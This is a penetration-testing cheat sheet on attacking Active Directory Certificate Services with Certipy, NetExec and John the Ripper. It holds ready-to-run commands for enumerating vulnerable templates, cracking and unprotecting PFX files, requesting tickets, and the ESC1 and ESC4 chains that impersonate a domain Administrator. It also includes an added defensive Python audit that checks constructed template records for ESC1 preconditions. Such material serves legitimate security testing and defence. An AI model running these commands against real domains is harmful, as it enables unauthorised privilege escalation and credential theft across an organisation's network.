ADCS
Enumeration
Certipy can list vulnerable ADCS templates for given user credentials.
certipy find -u 'user'@domain.com -p 'password' -dc-ip 1.2.3.4 -vulnerable -stdout
If it doesn't return any vulnerabilities, review each template to see which other users/groups have rights over it that you may want to leverage.
certipy find -u 'user'@domain.com -p 'password' -dc-ip 1.2.3.4 -stdout
Usage
How to use a certificate / PFX file
NetExec supports PFX files:
nxc smb dc01.domain.htb -u administrator --pfx-cert administrator.pfx -x whoami
# Crack password if any
pfx2john.py legacyy_dev_auth.pfx > hashpfx
/opt/john/run/john hashpfx -wordlist=/usr/share/wordlists/rockyou.txt
# Save PFX without protection
certipy cert -export -pfx protected.pfx -password "password" -out unprotected.pfx
# Request TGT (then pass the ticket)
certipy auth -pfx unprotected.pfx -dc-ip 1.2.3.4 -domain 'domain.local' -username 'Administrator'
# OR...
# Extract cert and key from pfx
certipy cert -pfx unprotected.pfx -nokey -out user.crt
certipy cert -pfx unprotected.pfx -nocert -out user.key
# Use cert and key to connect with winrm
# https://gitlab.com/charles.gargasson/wintools/-/blob/main/winrmcert.rb
ruby winrmcert.rb --ip 10.129.227.113 --cert user.crt --key user.key
ESC1
ESC1 - Misconfigured Certificate Templates
Check whether the template allows impersonation ("Enrollee Supplies Subject" set to True, i.e. the requester chooses the subject/SAN).
Then check whether you are a member of one of the groups that hold enrollment rights on it.
If both requirements are met, generate a PFX certificate using the vulnerable template:
DC_IP="1.2.3.4"
DOMAIN="domain.com"
CANAME="theCAname"
TEMPLATE="VulnerableTemplate"
IMPERSONATE="Administrator"
UNPRIVILEGED_USER="beepboop"
UNPRIVILEGED_USER_PASS='potate'
certipy req -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -ca "$CANAME" -template "$TEMPLATE" -dc-ip $DC_IP -upn "$IMPERSONATE@$DOMAIN" -dns-tcp -ns $DC_IP -debug
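Added audit example (not Certipy's or the page's own code): the ESC1 preconditions listed above, evaluated against constructed template records through the msPKI flag bits and EKU OIDs they map to; a template is a finding only when every condition holds, and the returned blocker list shows a defender which single setting (manager approval, an authorized signature, no authentication EKU, or a subject built from AD) already breaks the chain.

```python
# Added ESC1 audit example (not Certipy's code); template records are constructed.
from dataclasses import dataclass, field

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # msPKI-Certificate-Name-Flag bit
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # msPKI-Enrollment-Flag: manager approval
AUTH_EKUS = {                            # EKUs usable for domain authentication
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users"}

@dataclass
class Template:
    name: str
    name_flag: int        # msPKI-Certificate-Name-Flag
    enrollment_flag: int  # msPKI-Enrollment-Flag
    ra_signatures: int    # msPKI-RA-Signature (authorized signatures required)
    ekus: set = field(default_factory=set)               # pKIExtendedKeyUsage OIDs
    enroll_principals: set = field(default_factory=set)  # principals holding Enroll

def esc1_blockers(t: Template) -> list:
    """ESC1 preconditions the template does NOT meet; empty list means ESC1 applies."""
    blockers = []
    if not t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        blockers.append("subject is built from AD, not supplied by the requester")
    if t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        blockers.append("manager approval required")
    if t.ra_signatures > 0:
        blockers.append("authorized signature required")
    if t.ekus and not (t.ekus & AUTH_EKUS):  # an empty EKU set means any purpose
        blockers.append("no authentication EKU")
    if not (t.enroll_principals & LOW_PRIV_PRINCIPALS):
        blockers.append("no low-privilege principal holds Enroll")
    return blockers

# Constructed sample records, not taken from any real domain.
CONSTRUCTED = [
    Template("VulnerableTemplate", 0x1, 0x0, 0, {"1.3.6.1.5.5.7.3.2"}, {"Domain Users"}),
    Template("ApprovedClientAuth", 0x1, 0x2, 0, {"1.3.6.1.5.5.7.3.2"}, {"Domain Users"}),
    Template("SubjectFromAD", 0x0, 0x0, 0, {"1.3.6.1.5.5.7.3.2"}, {"Domain Users"}),
    Template("WebServerOnly", 0x1, 0x0, 0, {"1.3.6.1.5.5.7.3.1"}, {"Domain Users"}),
]

def audit(templates=CONSTRUCTED) -> dict:
    """Map each template name to its blockers; names mapped to [] are the ESC1 findings."""
    return {t.name: esc1_blockers(t) for t in templates}
```

Running `audit()` on the constructed records flags only VulnerableTemplate; the other three each show the one setting that stops the chain.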
ESC4
ESC4 - Vulnerable Certificate Template Access Control
With write access to the template, you modify its configuration so that it becomes vulnerable to ESC1.
# Modify template (and backup the old one)
certipy template -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -dc-ip $DC_IP -template "$TEMPLATE" -save-old
# Exploit ESC1, retrieve impersonated user certificate
certipy req -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -dc-ip $DC_IP -template "$TEMPLATE" -ca "$CANAME" -upn "$IMPERSONATE@$DOMAIN"
# Restore config
certipy template -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -dc-ip $DC_IP -template "$TEMPLATE" -configuration "${TEMPLATE}.json"